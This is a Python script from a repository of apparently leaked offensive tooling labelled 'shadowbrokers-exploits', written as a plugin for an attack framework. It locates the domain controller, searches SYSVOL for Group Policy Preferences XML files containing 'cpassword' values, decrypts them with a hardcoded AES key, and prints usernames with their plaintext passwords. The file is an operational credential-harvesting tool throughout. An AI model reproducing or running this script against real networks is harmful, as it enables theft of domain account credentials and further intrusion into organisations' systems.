shadowbrokers-exploits/windows/Resources/Ops/PyScripts/GPPPassword.py

61 lines
2.3 KiB
Python
Raw Permalink Normal View History

import ops.cmd
import dsz.version, dsz.path, dsz.control, dsz.lp
import sys
from xml.dom import minidom
def main():
found = False
dcName = ''
domainName = ''
try:
myCommand = ops.cmd.getDszCommand('domaincontroller -primary')
cmdRes = myCommand.execute()
dcName = cmdRes.domaincontroller[0].dcname
domainName = cmdRes.domaincontroller[0].domainname
ops.info(('The dc is %s for %s' % (dcName, domainName)))
except:
ops.error('This machine does not appear to be part of the domain')
quit()
sharePath = ('SYSVOL\\' + domainName)
fullShare = ((dcName + '\\') + sharePath)
myCommand = ops.cmd.DszCommand('grep', pattern='cpassword', path=fullShare, mask='*xml', recursive=True)
cmdRes = myCommand.execute()
for xmlfile in cmdRes.file:
if xmlfile.line:
for ret_value in xmlfile.line:
if ('cpassword' in ret_value.value):
found = True
parsexml(ret_value.value)
if (not found):
ops.info('Failed to find any .xml files in sysvol with creds stored')
def decrypt(encpass):
sys.path.append('C:\\python27\\lib\\site-packages')
import Crypto.Cipher.AES, codecs
dc = codecs.getdecoder('Base64')
mod = ((4 - (len(encpass[0]) % 4)) % 4)
if (not (mod == 0)):
encpass += ('=' * mod)
decode_encpass = dc(encpass)
AESKey = 'N\x99\x06\xe8\xfc\xb6l\xc9\xfa\xf4\x93\x10b\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05y\x90 \x9b\t\xa43\xb6l\x1b'
try:
test = Crypto.Cipher.AES.new(AESKey, Crypto.Cipher.AES.MODE_CBC, ('\x00' * Crypto.Cipher.AES.block_size))
res = test.decrypt(decode_encpass[0])
except Exception as e:
ops.error(e)
quit()
clean_res = res.strip('\x10').replace('\x00', '')
return clean_res
def parsexml(xmlstring):
data = minidom.parseString(xmlstring)
userdata = data.getElementsByTagName('User')
properties = data.getElementsByTagName('Properties')
for i in xrange(0, len(userdata)):
name = userdata[i].getAttribute('name')
cpassword = properties[i].getAttribute('cpassword')
decpassword = decrypt(cpassword)
ops.info(('Name: %s\tPassword: %s' % (name, decpassword)))
if (__name__ == '__main__'):
main()